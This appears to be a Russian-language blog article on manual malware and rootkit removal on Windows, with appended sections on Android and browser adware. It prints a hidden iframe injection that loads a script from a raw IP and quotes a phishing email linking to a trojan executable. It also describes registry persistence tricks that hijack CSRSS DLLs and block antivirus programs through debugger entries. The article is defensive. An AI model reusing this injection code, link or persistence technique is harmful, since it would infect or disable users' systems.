Как удалить вирус вручную с компьютера? Как найти вирусы в компьютере вручную? Как удалить вирусы с компьютера, если антивирус их не видит.

23.09.2019
Что делать, если антивирус не справился со своей работой.

    Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или... много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус - это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) - гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами - не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.

Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден - должна быть запущена какая-то программа. Идеально - с административными правами, желательно - без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. - большинство грамотных пользователей данную опцию отключили навсегда.

Для отключения функций автозапуска в Windows XP/2000 reg-файл для импорта в реестр.

Для Windows 7 и более поздних отключение автозапуска можно выполнить с использованием апплета "Автозапуск" панели управления. В этом случае отключение действует по отношению к текущему пользователю. Более надежным способом защиты от внедрения вирусов, переносимых на съемных устройствах, является блокировка автозапуска для всех пользователей с помощью групповых политик:

  • запустить редактор групповых политик gpedit.msc
  • перейти в "Конфигурация компьютера" - - "Конфигурация Windows" - "Административные шаблоны" - "Компоненты Windows" - "Политика автозапуска".
  • установить значение "Вкл." для компонента "Отключить автозапуск"

  •     Но основным "поставщиком" вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение - "Обозреватель Интернета" (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс - интерпретатор данных, полученных извне. Другими словами, - в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать "сайты для взрослых", сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами "скачать бесплатно" и " скачать без регистрации и SMS". Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы.

        Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR"ом, а изменения в реестре отменены PT Startup Monitor"ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:

    iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

    Означающий выполнение CGI-сценария сервера с IP - адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат - вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега "iframe" сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.

        В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами - так называемые руткит (rootkit) - технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.

        Удаление "качественного" вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами - вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, - все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.

        Развитие антивирусов тоже не стоит на месте, - они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет "не по зубам" любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса - это работа, которую рано или поздно придется выполнять любому пользователю компьютера.

    Здравствуйте.
    Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
    наш фирменный бланк резюме и отправить его по адресу [email protected]
    Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
    позвоним Вам в течение нескольких дней. Не забудьте
    указать телефон, а также позицию, на которую Вы претендуете. Желательно
    также указать пожелания по окладу.
    Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
    http://verano-konwektor.pl/resume.exe

        Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.

        Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего, получите троянскую программу на свой компьютер.
        Скачиваю файл resume.exe. Размер - 159744 байта. Пока не запускаю.
        Копирую файл на другие компьютеры, где установлены различные антивирусы - просто для очередной проверки их эффективности. Результаты не ахти - антивирус Avast 4.8 Home Edition деликатно промолчал. Подсунул его Symantec"у - та же реакция. Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле, не зря набирает популярность.
        Все эксперименты выполняю на виртуальной машине с операционной системой Windows XP. Учетная запись с правами администратора, поскольку, чаще всего вирусы успешно внедряются в систему только, если пользователь является локальным администратором.
        Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал свое черное дело.
        Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка. На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP. Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) - надо же оставить вирусу хоть какую-то возможность проявить свою активность. Как правило, после внедрения, вирус должен связаться с хозяином или с заданным сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете сказанного выше, умный вирус может их замаскировать, кроме того, он может и обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого не произошло, но для надежного анализа сетевой активности весь трафик зараженной машины лучше пустить через другую, незараженную, где можно быть уверенным, что правила брандмауэра выполняются, а анализатор трафика (я пользовался Wireshark"ом) выдает то, что есть на самом деле.
        Перезагружаюсь. Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет, поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в службах, ни в системных каталогах не появилось ничего нового. Просмотр системного журнала дает только одну наводку - системе не удалось запустить таинственную службу grande48 . Такой службы у меня быть не могло, да и по времени это событие совпало с моментом внедрения. Что еще наводит на мысль об успешном внедрении - так это отсутствие в реестре записи о службе grande48 и отсутствие второго сообщения в журнале системы об ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая недоработка вирусописателей. Хотя и несущественная, ведь большинство пользователей журнал событий не просматривают, да и на момент возникновения подозрения на заражение эта запись в журнале уже может и отсутствовать.

    Определяем наличие вируса в системе.

    1.     Наверняка должен быть "левый" трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось - один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.

    2.     Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Одна из наиболее популярных - Марка Руссиновича, которую можно скачать на странице раздела Windows Sysinternals сайта Microsoft. Инсталляция не требуется. Разархивируем и запускаем. Жмем "Scan". После непродолжительного сканирования видим результаты:

        Кстати, даже не вникая в содержания строк, можно сразу заметить, что имеются очень "свежие" по времени создания/модификации записи или файлы (колонка "Timestamp") . Нас в первую очередь должны заинтересовать файлы с описанием (колонка "Description" ) - "Hidden from Windows API" - скрыто от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений - это, естественно, ненормально. Два файла - grande48.sys и Yoy46.sys - это как раз то, что мы ищем. Это и есть прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала - это нормальные драйверы Windows XP. Кроме того, вирус скрывал их наличие только в папке \system32 , а их копии в \system32\dllcache остались видимыми.
        Напомню, что в Windows XP применяется специальный механизм защиты системных файлов, называемый Windows File Protection (WFP) . Задача WFP - автоматическое восстановление важных системных файлов при их удалении или замене устаревшими или неподписанными копиями. Все системные файлы Windows XP имеют цифровую подпись и перечислены в специальной базе данных, используемой WFP. Для хранения копий файлов используется папка \system32\dllcache и, отчасти, \Windows\driver cache . При удалении или замене одного из системных файлов, WFP автоматически копирует "правильную" его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache , то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP. Попробуйте удалить vga.sys из \system32, и система тут же его восстановит, используя копию из dllcache. А ситуация, когда, при работающей системе восстановления файлов, файл драйвера есть в \dllcache и его не видно в \system32 - это тоже дополнительный признак наличия руткита в системе.

    Удаляем вирус из системы.

        Осталось выполнить самое важное действие - удалить вирус. Самый простой и надежный способ - загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.

    Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню - жмем R.

    Выбираем систему (если их несколько):

    Вводим пароль администратора.
    Список драйверов и служб можно просмотреть с помощью команды listsvc:

    В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:

    Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:

        Водим команду EXIT и система уходит на перезагрузку.
    После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его файлы и очистить реестр от его записей. Можно проделать это вручную, а можно использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения, будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря Данилова. Скачать можно отсюда - http://freedrweb.ru
        Там же можно скачать "Dr.Web LiveCD" - образ диска, который позволяет восстановить работоспособность системы, пораженной действиями вирусов, на рабочих станциях и серверах под управлением Windows\Unix, скопировать важную информацию на сменные носители либо другой компьютер, если действия вредоносных программ сделали невозможным загрузку компьютера. Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и подозрительных файлов, но и попытается вылечить зараженные объекты. Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением.iso) и записать его на CD. Будет создан загрузочный диск, загрузившись с которого, руководствуетесь простым и понятным меню.

        Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD, можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить, загрузившись в другой ОС, например, с использованием Winternals ERD Commander. Для сканирования зараженной системы необходимо указать именно ее жесткий диск (Режим "Выборочная проверка"). Сканер поможет вам найти файлы вируса, и вам останется лишь удалить связанные с ним записи из реестра.
        Поскольку вирусы научились прописываться на запуск в безопасном режиме загрузки, не мешает проверить ветку реестра:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot
    Разделы:
    Minimal - список драйверов и служб запускаемых в безопасном режиме (Safe Mode)
    Network - то же, но с поддержкой сети.

    Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и, естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.

        Если у вас возникли сомнения относительно какого-либо файла, то можно воспользоваться бесплатной онлайновой антивирусной службой virustotal.com . Через специальную форму на главной странице сайта закачиваете подозрительный файл и ждете результатов. Сервисом virustotal используются консольные версии множества антивирусов для проверки вашего подозреваемого файла. Результаты выводятся на экран. Если файл является вредоносным, то с большой долей вероятности, вы сможете это определить. В какой-то степени сервис можно использовать для выбора "лучшего антивируса".
    ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн - проверок компьютера, браузера, файлов...

        Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается "Диспетчер сеансов" (\SystemRoot\System32\smss.exe) , задача которого - запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services

        Информация, предназначенная для диспетчера сеансов, находится в ключе реестра

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager

    Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems

    То найдете значения

    ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll - это "правильные" файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:

    ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)

    Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится "синим экраном смерти" (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.

    Поправить ситуацию можно так:

    Загрузится в консоль восстановления (или в любой другой системе), и скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку под именем basepvllk32.dll. После чего система загрузится и можно будет вручную подправить запись в реестре.
    - загрузиться с использованием Winternals ERD Commander и исправить запись в реестре на ServerDll=basesrv . Или выполнить откат системы с использованием точки восстановления.

        Еще один характерный пример. Вредоносная программ регистрируется как отладчик процесса explorer.exe, создавая в реестре запись типа:

    "Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
    Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к невозможности запуска explorer.exe. В результате вы получаете пустой рабочий стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию клавиш CTRL-ALT-DEL. Выбираете "Диспетчер задач" - "Новая задача" - "Обзор" - находите и запускаете редактор реестра regedit.exe. Затем удаляете ключ
    HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
    и перезагружаетесь.

        В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье "Проблемы с загрузкой ОС" раздела "Windows"

        == Май 2008. ==

    Дополнение

        Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.

    После удаления вируса ни один антивирус не работает.

        Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный "Стрим Антивирус". Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы "Avira Antivir Guard". Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность - вирусов, руткитов и прочей гадости (Malware) в системе нет.
        В какой-то момент попробовал запустить антивирусную утилиту AVZ . Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения анализа результатов проверки системы за счет отметки легитимных объектов цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
    Но: исполняемый файл avz.exe не запустился! Переименовываю avz.exe в musor.exe - все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:

    Опасно - отладчик процесса "avz.exe"="ntsd-d"
    Опасно - отладчик процесса "avguard.exe"="ntsd-d"
    :.

    Это была уже серьезная зацепка. Поиск в реестре по контексту "avz" привел к обнаружению в ветке

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

    Раздела с именем avz.exe , содержащем строковый параметр с именем "Debugger" и значением .
    И, как выяснилось позже, в указанной ветке присутствовал не только раздел "avz.exe", но и разделы с именами исполняемых модулей практически всех известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe - вполне легальный отладчик Windows, стандартно присутствующий во всех версиях ОС, но подобная запись в реестре приводит к невозможности запуска приложения, имя исполняемого файла которого совпадает с именем раздела???.exe.

        После удаления из реестра всех разделов, c именем???.exe и содержащих запись "Debugger" = "ntsd -d" работоспособность системы полностью восстановилась.

    В результате анализа ситуации с использованием параметра "ntsd -d" для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:

    Windows Registry Editor Version 5.00

    "Debugger"="ntsd -d"
    "Debugger"="ntsd -d"
    "Debugger"="ntsd -d"
    :.. и т.д.

    Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте - в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем "Explorer.exe" - то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).

        Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием - не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.

    Наиболее простой и эффективный путь - загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.

  • Использование Dr.Web LiveCD - самый простой и не требующий специальных знаний способ. Скачиваете iso-образ CD, записываете его на болванку, загружаетесь с CD-ROM и запускаете сканер.
  • Использование Winternals ERD Commander. Загружаетесь с него, подключившись к зараженной системе, и выполняете откат на контрольную точку восстановления с датой, когда заражения еще не было. Выбираете меню System Tools - System Restore . Если откат средствами ERD Commander"а выполнить невозможно, попробуйте вручную найти файлы реестра в данных контрольных точек и восстановить их в каталог Windows. Как это сделать я подробно описал в статье "Работа с реестром".
  • Загрузка в другой ОС и ручное удаление вируса. Самый сложный, но самый эффективный способ. В качестве другой ОС удобнее всего использовать тот же ERD Commander. Методика обнаружения и удаления вируса может быть следующей:

    Переходите на диск зараженной системы и просматриваете системные каталоги на наличие исполняемых файлов и файлов драйверов с датой создания близкой к дате заражения. Перемещаете эти файлы в отдельную папку. Обратите внимание на каталоги

    \Windows
    \Windows\system32
    \Windows\system32\drivers
    \Windows\Tasks\
    \RECYCLER
    \System Volume Information
    Каталоги пользователей \Documents And Settings\All Users и \Documents And Settings\имя пользователя

    Очень удобно использовать для поиска таких файлов FAR Manager, с включенной сортировкой по дате для панели, где отображается содержимое каталога (комбинация CTRL-F5). Особое внимание стоит обратить на скрытые исполняемые файлы. Существует также эффективная и простая утилита от Nirsoft - SearchMyFiles, применение которой позволяет, в подавляющем большинстве случаев, легко обнаружить вредоносные файлы даже без использования антивируса. Способ обнаружения вредоносных файлов по времени создания (Creation time)

    Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.

    Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) - дает положительный эффект. Даже если вирус не обнаруживается антивирусами.

    Если предыдущие методики не дали результата, остается одно - ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander"а имеются пункты:

    Autoruns - информация о параметрах запуска приложений и оболочке пользователя.
    Service and Driver Manager - информация о службах и драйверах системы.

  • - В качестве продолжения темы - как избавиться от вирусов с помощью стандартных средств операционной системы Windows Vista \ Windows 7. Использование безопасного режима с поддержкой командной строки.
  • Использование загрузочного диска Winternals ERD Commander - Подробная инструкция по применению диска аварийного восстановления системы, созданного на базе Microsoft Diagnostic and Recovery Toolset (MS DaRT) .
  • Сайт Олега Зайцева, автора AVZ. - Посвящен информационной безопасности, и в частности - применению одной из наиболее эффективных антивирусных утилит AVZ.
  • Восстановление системы после вирусного заражения Как восстановить работоспособность Windows после удаления вируса, повредившего некоторые настройки. Помогает в случаях, когда не запускаются программы, при подмене страниц, открываемых обозревателем, подмене домашней страницы, страницы поиска, при изменении настроек рабочего стола, невозможности запуска редактора реестра, отсутствии доступа в Интернет, недоступности некоторых сайтов и т.п.
  • Проблема безопасности мобильных устройств — одна из самых актуальных на сегодняшний день. Возникает множество вопросов по поводу защиты персональных данных на Вашем телефоне. Не все могут найти на них ответ. Большинство вредоносных программ – это реклама и баннеры, но даже среди них встречаются и крайне неприятные вирусы, цель которых - выкачивать деньги с мобильного счета, делать покупки и переводы с Вашей банковской карты, привязанной к учётной записи, а также копировать Вашу персональную информацию: контакты, фото, видео, SMS – сообщения. Так как удалить вирус с телефона? Для начала разберемся, как понять, что устройство заражено:

    1. Появляются рекламные баннеры. Это рекламный вирус. Объявления, оповещения приходят на рабочий стол, в браузере даже тогда, когда вы не онлайн.
    2. Смартфон самостоятельно скачивает и устанавливает приложения.
    3. Материалы на карте или во внутреннем хранилище недоступны: повреждены или удалены.
    4. Некоторые приложения работают неправильно, «вылетают», самопроизвольно закрываются.
    5. Телефон перегревается и быстро разряжается.
    6. Появились смс-рассылки на незнакомые номера, реклама. Это смс-вирус, который опасен возможной утечкой личных данных.

    В статье описаны советы как правильно удалить вирус с Андроида и не только. Разберем несколько вариантов.

    Проверка антивирусом

    Сканирование смартфона через компьютер

    Ни для кого не секрет, что вирусы, поражающие операционную систему ПК намного разнообразнее и опаснее, чем их «младшие братья» на андроиде. Вспомним тот же самый вирус Petya, который поразил корпоративные компьютеры по всему миру и нанес огромный ущерб управляющим компаниям. Именно из-за таких моментов, антивирусы, защищающие Ваш ПК, намного мощнее и продуктивнее. Чтобы проверить Ваше мобильное устройство с помощью антивируса ПК, в меню «Настройки» поставьте флажок напротив пункта «Отладка USB». После подключите смартфон к компьютеру через USB – кабель и просканируйте антивирусом ПК. Несмотря на то, что мобильные вирусы имеют другой программный код, защитник на компьютере легко справится.

    Удаление вируса вручную

    Этот вариант удаления подразумевает под собой отслеживание вредоносного ПО через диспетчер запущенных приложений для определения зараженного файла. Для начала нужно перейти в меню «Настройки» и открыть «Диспетчер приложений». После этого найти вкладку «Запущенные приложения» и просмотреть, какие из них работают в данный момент.

    Будьте осторожны! При использовании этого способа, возможно закрытие «здоровых» системных программ, что может привести к неправильной работе мобильной ОС. После того, как Вы нашли неизвестную программу, найдите корневую папку с зараженным файлом формата.apk и удалите его. После всех этих операций проведите перезагрузку устройства.

    Удаление вируса с телефона Андроид в безопасном режиме

    Иногда программа блокирует системные функции устройства и вредоносный файл не удаляется. Тогда нужно перейти в безопасный режим, в котором запускаются только системные приложения. Для этого:

    • зажмите клавишу питания смартфона, пока не появится окно с предложением выключить устройство;
    • нажмите долгим тапом на опцию «Отключить». Появится иконка «Перейти в безопасный режим»;
    • ждите пока перезагрузится телефон;
    • удалите приложения и файлы, которые раньше не могли убрать.

    Возможность того, что деятельность удаленного вредного ПО возобновится, минимальна.

    Откат к заводским настройкам

    Если он не удаляется другими способами, этот способ удалить вирусы является самым последним и наиболее радикальным. При использовании отката к заводским настройкам, вся информация, что хранится на Вашем смартфоне, будет уничтожена, а телефон вернется в свой изначальный вид, в котором Вы его приобрели. Для того чтобы сохранить всю информацию, рекомендуем скопировать либо в облачное хранилище, либо на Ваш ПК. Такой вид борьбы самый простой и эффективный, а также подходит для «новичков».

    Как не заразиться?

    Невозможно на сто процентов защититься от зараженных файлов, но можно существенно оградить себя от возможного риска. Для этого стоит соблюдать несколько правил:

    Вирусы на смартфоне удаляются довольно легко и быстро, но все же лучше избегать подобных ситуаций и придерживаться правил безопасности, перечисленных выше.

    Поймали вирус в браузере, и теперь постоянно выскакивает реклама? Это ужасно раздражает. Да и вылечить браузер от вирусов не так-то просто. Их еще нужно найти, а многие современные антивирусы попросту не видят эту заразу. Собственно, поэтому у вас и появляются всплывающие окна, а также постоянно открываются рекламные страницы (например, Вулкан или других казино).

    Так что делать, если браузер заражен вирусом? Найти и избавиться от него 🙂 . Специально для этого ниже приведено 6 эффективных способов, как удалить вирус из браузера. А в качестве бонуса – пару полезных советов о том, как защитить свой компьютер или ноутбук от повторного заражения.

    Как понять, что браузер был заражен? Это можно увидеть по следующим симптомам:

    Откуда в браузере появляются вирусы

    Современные пользователи очень часто устанавливают игры, программы, расширения и вообще не смотрят, что именно ставят. Просто нажимают «Далее, далее, готово» – и вот еще один рекламный вирус незаметно пролез в вашу систему Windows. В результате появляются всплывающие окна, открываются рекламные страницы и пр.

    И в 99% случаев виноват сам пользователь. Почему? Да потому, что обычно лечение браузера от вирусов требуется после:


